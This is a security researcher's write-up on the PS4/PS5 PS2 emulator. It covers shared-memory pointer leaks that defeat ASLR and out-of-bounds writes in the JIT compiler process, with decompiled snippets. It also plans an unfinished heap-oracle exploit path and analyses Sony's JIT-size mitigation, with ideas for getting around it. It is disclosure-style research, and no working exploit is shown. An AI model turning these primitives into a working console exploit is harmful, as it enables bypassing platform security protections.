mast1c0re: Hacking the PS4 / PS5 through the PS2 Emulator - Part 2 - Compiler Attack

mast1c0re: Hacking the PS4 / PS5 through the PS2 Emulator - Part 2 - Compiler Attack

Initial publication: April 2nd, 2023

In the previous article I explained how I successfully escaped the PS2 emulator used in the PS4 and PS5 (through PS4 backwards compatibility) to allow execution of native ROP chains.

In this article, I'll explain how I used this context to attack the compiler process, with the goal of gaining fully arbitrary native code execution on the PS5 (not just ROP).


Output Manipulation?

As mentioned in the previous post, the emulator consists of 2 separate processes. We have so far taken over the application process, but need to also take over the compiler process in order to be able to run arbitrary native code on the PS5.

But let's step back for a second: do we really need to exploit the compiler process? Since we can jump anywhere in the application process, it would be sufficient to just get the compiler to produce continuous bytes of controlled content anywhere in the JIT output.

There's good reason to suspect that this may be possible. In one of my old PS4 articles I've previously described how in variable-length instruction sets like x86/64, you can find unintended instructions by decoding at offsets within existing instructions, which can be used as ROP gadgets.

What I didn't mention is that in a process performing dynamic code generation (JIT), we actually have even more control because we can directly influence what code is being written. For example, if we use some constant in our PS2 code we can get the compiler to output native PS4 instructions like the following:

mov esi, 0x41414141

The raw bytes for the above instruction (be 41 41 41 41) clearly contain 4-bytes of controlled content for the instruction's immediate value. We can encode arbitrary hidden instructions within these immediates.

Executing arbitrary single instructions is quite useful for writing ROP chains, but if we wanted to write continuously arbitrary data, we would need some way of producing overlapping code. Whilst I didn't investigate this deeply enough to rule it out entirely, unfortunately it seems unlikely to be possible; resetting the JIT cache state seems to also overwrite old JIT code with repeated invalid instructions.


Application <-> Compiler Communication

The application and child process establish a socket between each other (sceSystemServiceGetParentSocketForPs2Emu). This socket isn't really for transmitting data, but just used to signal when the application would like to initiate a request to the compiler (by sending a single byte), and for the compiler to notify the application of the request's completion.

A couple of the possible requests are then handled immediately, like 0x30 which is used for initialisation, and 0x42, which terminates the compiler, but the other request types (0x31 for PS2 EE processor, and 0x32 for PS2 IOP processor) trigger handling from dedicated threads so that compilation of various PS2 chips can be handled concurrently.

The main channel of communication is the bridge region, ps2_bridge_comm_rw, which is mapped at the fixed address 0x914104000 in both processes as shared memory.


Race Conditions

Given a shared memory communication channel between a lower and higher privilege process, my initial instict was to look for race condition bugs like double-fetch / TOCTOU.

Race conditions seem quite common in this code; as one example, here's a snippet from 0x100e201 in Okage 1.01's compiler binary, it's a bounds check ensuring the number of requested iterations to be less than 0x10, but it reads the number from shared memory again on every loop iteration:

if (0xf < *(uint *)((long)ptrWithinBridge + 0x3ce0)) {
  pcVar4 = (char *)0x0;
  goto LAB_0100e2ba;
}
i = 0;
do {
  ...
  i++;
  ...
} while (i < *(uint *)((long)ptrWithinBridge + 0x3ce0));

I didn't fully analyse this bug, because there are similar loops that forget the bounds checks entirely (EG: at 0x100e0be), but these don't seem to be useful as they only lead to out-of-bounds read on the bridge memory region which we fully control anyway.


Vulnerability 1 - Pointers in Shared Memory!

The next observation was that, for some inexplicable reason, the compiler process puts 2 pointers, pointing within its data section, into the shared memory region! Shoutout to TheFlow for initially spotting this.

It sets these two fields (at offsets 0x9CA3C0 and 0x9CED90) in main during initialisation of ps2_bridge_comm_rw contents:

*(_QWORD *)(ps2_bridge_comm_rw + 0x9CA3C0) = &off_1E81E8; // <--- Pointer written to bridge!
v196 = 0LL;
do
{
    *(_BYTE *)(ps2_bridge_comm_rw + v196 + 10280038) = 0;
    *(_BYTE *)(ps2_bridge_comm_rw + v196 + 10280039) = 0;
    *(_QWORD *)(ps2_bridge_comm_rw + v196 + 10280040) = 0LL;
    v196 += 16LL;
}
while ( v196 != 4096 );
*(_QWORD *)(ps2_bridge_comm_rw + 0x9CED90) = &off_1E8208; // <--- Pointer written to bridge!

Reading these pointers from our compromised application process lets us defeat ASLR of the compiler's text and data sections.

Unfortunately, overwriting the pointers doesn't seem to trigger any corruption in the compiler process because they never seem to be used.


Vulnerability 2 - OOB Write in manuallyInjectFunction

The application process can manually request a handful of specialised functions be outputted by the compiler. Strings in the binary reveal some of their names: Kernel_ICacheClear, Kernel_CacheClearNOP, Kernel_ERET_EnableInts, and Psychonauts_compareFunction_EMeshFrag.

Based on an error handling string this function references ("Invalid manual injection index = %d"), I named this function manuallyInjectFunction, and it is where I found the first memory corruption vulnerability.

After generating the requested function, it finishes by adding the resultant native code entry into the compiler's cache of PS2 addresses -> native code entries, and then writing its response to the bridge region, where the application can ultimately read it. Here's a decompilation of this snippet from 0x108e675:

  this->instructionMappingCache[instructionMappingIndexMasked] = iVar6;
  ptrWithinBridgeRegion = this[1].field_0x70;

  controlledIndex = *(int *)(ptrWithinBridgeRegion + 0x3c58); // <-(1)-------
  controlledIndexPlus1Masked = controlledIndex + 1U & 0x3ff;

  if (controlledIndexPlus1Masked != *(uint *)(ptrWithinBridgeRegion + 0x3c98)) {
    *(uint *)(ptrWithinBridgeRegion + 0xc60 + (long)controlledIndex * 0xc) = instructionMappingIndexMasked; // <-(2)-------
    *(int *)(ptrWithinBridgeRegion + 0xc58 + (long)*(int *)(ptrWithinBridgeRegion + 0x3c58) * 0xc) = iVar6;
    *(undefined4 *)(ptrWithinBridgeRegion + 0xc5c + (long)*(int *)(ptrWithinBridgeRegion + 0x3c58) * 0xc) = 0xffffffff;
    *(uint *)(ptrWithinBridgeRegion + 0x3c58) = controlledIndexPlus1Masked;
    return;
  }

Debugging this code revealed that ptrWithinBridgeRegion points to 0x914105B30, which resides in the bridge shared memory region, making the vulnerability quite apparent: we can have the compiler read an arbitrary 4-byte signed integer into controlledIndex at (1), and then have it used as an array index write at (2), without any bounds checks between!

As the bridge is mapped at a constant address, we can even calculate the exact range of addresses that this out-of-bounds index will let us write to in the compiler: anywhere from 0x314106790 (0x914105B30 + 0xc60 - 0x80000000 * 0xc) to 0xF14106784 (0x914105B30 + 0xc60 + 0x7fffffff * 0xc), at 0xc byte intervals.

The value written, instructionMappingIndexMasked, is derived from the requested PS2 address as specified by bridge memory, calculated as ((arbitrary_4bytes_read_from_bridge >> 2) & 0xffffff) * 4, so can be any multiple of 4 from 0 to 0x3fffffc.


Vulnerability 3 - OOB Write in writeRelativeJump

Here's the code that generates relative jump instructions (x86 instructions 0xe9 and 0xeb) at (2) and (3); however, just before then it has this 16-byte AVX write into an array in shared bridge memory at (1), using an index that is also read from the bridge:

    _anotherPointerWithinBridge = anotherPointerWithinBridge;
    auVar6 = vmovaps_avx(*param_2);
    auVar2 = vmovaps_avx(auVar6);
    *(undefined (*) [16])(anotherPointerWithinBridge + 0x40a0 + (long)*(int *)(anotherPointerWithinBridge + 0x4090) * 0x10) = auVar2; // <-(1)-------
    *(int *)(_anotherPointerWithinBridge + 0x4090) = *(int *)(_anotherPointerWithinBridge + 0x4090) + 1;
    local_d0 = *(byte *)&this[0x135].field_0x124 | 0x20000400;
    padJITcode(SUB168(auVar6,0),this,&local_d0,(long)*(int *)(_anotherPointerWithinBridge + 0x10));
    puVar5 = *(undefined **)((long)&this->jitOutput + 4);
    jumpTarget = *(int *)(anotherPointerWithinBridge + 0x4060 + (ulong)bVar13 * 8) - (int)puVar5;
    if (jumpTarget - 0x82U < 0xffffff00) {
      *puVar5 = 0xe9; // <-(2)-------
      lVar9 = *(long *)((long)&this->jitOutput + 4);
      *(long *)((long)&this->jitOutput + 4) = lVar9 + 1;
      *(int *)(lVar9 + 1) = jumpTarget + -5;
      lVar9 = lVar9 + 5;
    }
    else {
      *puVar5 = 0xeb; // <-(3)-------
      lVar9 = *(long *)((long)&this->jitOutput + 4);
      *(long *)((long)&this->jitOutput + 4) = lVar9 + 1;
      *(char *)(lVar9 + 1) = (char)jumpTarget + -2;
      lVar9 = *(long *)((long)&this->jitOutput + 4) + 1;
    }

Once again, as the bridge has a constant address, we can calculate the exact range of addresses that this out-of-bounds write will let us write to in the compiler. In this case, from 0x914AD2D90 + 0x40a0 - 0x80000000 * 0x10 = 0x114AD6E30 to 0x914AD2D90 + 0x40a0 + 0x7fffffff * 0x10 = 0x1114AD6E20.

Note that there's also another OOB write in the handling of a "generic rewrite request" (EE request type 0x215), but since it writes the value 0, it's slightly less interesting.


Choosing a Mapping to Corrupt

Now we need to decide which OOB vulnerability to use, and what to corrupt with it.

Since both OOB writes occur relative to an array within the bridge region, which we already control the entirety of, our corruption target will need to be in a separate memory mapping to be useful, which will be a random number of pages away due to ASLR.

Because of this, Vulnerability 3 is much more attractive because its stride (0x10) is a factor of the page size, and so the offsets within different pages that we can corrupt will be consistent across different runs.

We already know where the compiler processes' data section is, thanks to Vulnerability 1 (pointers in the bridge), but unfortunately it's too far away for us to try to corrupt (it's one of the first things mapped in the process and will have a relatively low address like 0x7d7cc000, whilst the lowest we can write to with Vulnerability 3 is 0x114AD6E30).


Locating the Heap

A target we could reach would be the heap, but again, due to ASLR we don't know its exact address.

Here's a sample of base addresses for the 0x7000000-byte sized sceLibcHeap mapping across various runs:

Experimentally we can see that just 10 of those 64 bits are not constant, so we know almost 85% of the heap's base address with no prior knowledge. So even though we don't know the heap's exact base address, we know for certain that an address like 0x201000860 will always fall inside this heap mapping.

Let's go back to that instructionMappingCache array I mentioned when describing Vulnerability 1: it's an array that maps every possible PS2 address that could be executed into a 4-byte native function index. It is allocated on the heap early during initialisation (giving it offset 0x860 in the heap), and is 0x04000000 bytes... this turns out to be almost 60% of the heap!

Putting these 2 pieces together, you'll realise that there just isn't enough entropy to hide instructionMappingCache. If we pick an index that will target address 0x201000860 with OOB write Vulnerability 3, it is guaranteed to corrupt instructionMappingCache, at 1 of 2^10 == 1024 possible offsets.

Once we've corrupted one of the possible entries in instructionMappingCache, we can attempt an oracle attack to find exactly which entry was corrupted: request the compiler process to JIT each of the 1024 PS2 addresses that possibly correspond with the corrupted instructionMappingCache entry, until we find the anomalous result. Once we know which index into the array was corrupted, we can calculate the array's base address, and thus the base address of the heap (-0x860), with which we can derive the address of anything else on the heap (since the heap itself doesn't employ any randomisation).


(Unfinished)

I never finished the exploit, sorry.

But when summarising the primitives outlined already, it seems reasonable that it would be possible to develop this into a complete exploit taking over the compiler process:


Aftermath

As discussed in my previous post, for various reasons the Operating System was not designed to enforce games to be on their latest version, and so the fact that there are games with special privileges is an oversight in their security model, as it leaves privileged code with no readily available mechanism to be patched.

Some commenters disagreed with the above interpretation because PlayStation could still technically prevent exploitation on later updates (even though I already addressed this in my original post). I stand by my assessment because the options for doing so would be terrible: creating a software deny-list that would have to include some physical discs, or bundling binary patches for games in the OS itself.

Anyway, as I predicted, PlayStation decided not to re-design their security model and build a mechanism for enforcement of game patches. Instead they have accepted the reality of JIT compiler processes potentially being permanently compromisable, and attempted to limit the consequences of this.

Whilst I can only speculate on PlayStation's motivations, I believe their main concern regards the theoretical scenario of this being used to load patched retail PS4 games into the process and trying to boot them. PlayStation decided that they could mitigate this risk by placing a limit on the amount of JIT code allocatable. The limit is 65MB.


Patch Analysis

PS5 firmware 6.00 (and equivalent for PS4) introduce a new global variable that I call allocatedJitMemoryTowardsLimit; its main use is in sys_jitshm_create in file sys/freebsd/sys/kern/kern_jitshm.c, which looks something like this:

        if ((requestedProt & PROT_EXEC) == 0) {
          applyJitLimit = false;
        }
        else {
          applyJitLimit =
            sceSblACMgrIsJitApplicationProcess(td->proc) ||
            sceSblACMgrIsJitCompilerProcess(td->proc);
        }

        ...

          mtx_lock(&jitCounterLock);
          
          requestedJitMemoryTowardsLimit = 0;
          if (applyJitLimit)
            requestedJitMemoryTowardsLimit = requestedSize;
          
          if (requestedJitMemoryTowardsLimit + allocatedJitMemoryTowardsLimit < 65 * 1024 * 1024) {

            // Perform allocation
            ...

            allocatedJitMemoryTowardsLimit += requestedJitMemoryTowardsLimit;
            mtx_unlock(&jitCounterLock);

And there's corresponding code to decrease the counter when freeing JIT memory.

The mitigation itself seems to be implemented correctly; there's locking so the check can't be raced, integer overflow isn't possible because we can't request large enough allocations for separate reasons, sys_jitshm_create can't create objects with the GPU executable bit instead, and we can't later add the executable protection to aliases through sys_jitshm_alias if the original doesn't have it, etc.

But the wider implications of this mitigation strategy are more interesting than the implementation itself.


Patch Implications

The mitigation does indeed prevent you from loading large programs completely into memory all at once. But is that strictly necessary for them to be run?

There are a couple of tricks that come with some performance overhead, but I believe would make it possible to "run" larger amounts of code than the imposed limit:

  1. Since not all code is constantly required, it could be dynamically paged in as needed. A more sophisticated approach could even use profiling to identify "hot paths" and prioritise using the JIT budget for those to maximise performance.

  2. The 65MB JIT budget could be used to write an efficient x86-64 emulator in native x86-64. Specifically, in other platforms where JIT is limited, we've seen an interesting technique of using weird machine control flow to efficiently jump directly between ROP-like gadgets that emulate individual instructions, as opposed to the more traditional interpreter emulation loop. I first saw this technique in the 'goombacolor' GameBoy Color emulator for GameBoy Advance (where the game has to reside in cartridge ROM instead of size-limited RAM, where it obviously can't be rewritten), but a more modern example is in the UTM SE project (described here) which shows how efficient this type of emulator can be on more modern platforms like iOS (where JIT is disallowed).

Furthermore, when considering the scenario of trying to run PS4 games on the PS5, some amount of overhead might even be offset by the fact that the PS5 runs faster than the PS4 anyway.


Conclusion

There's a reasonably good chance that with enough motivation the vulnerabilities described in this post could be exploited to take over the compiler process.

The exploit would allow arbitrary code execution on the latest firmwares of the PS4 and PS5, allowing native homebrew applications to be run off USB storage for example.

Even with the mitigation Sony shipped in response to this research to limit the size of applications that could be run, I still believe it would be possible to to run larger applications albeit with the performance overhead of them being partially emulated or dynamically paged in and out. With the amount of work required, I don't realistically think we'll see polished demos of Linux or retail PS4 games running, but it's fun to think that there's a good chance that theoretically those things might at least be technically possible.


Thanks

flatz, balika011, theflow0, chicken(s), PlayStation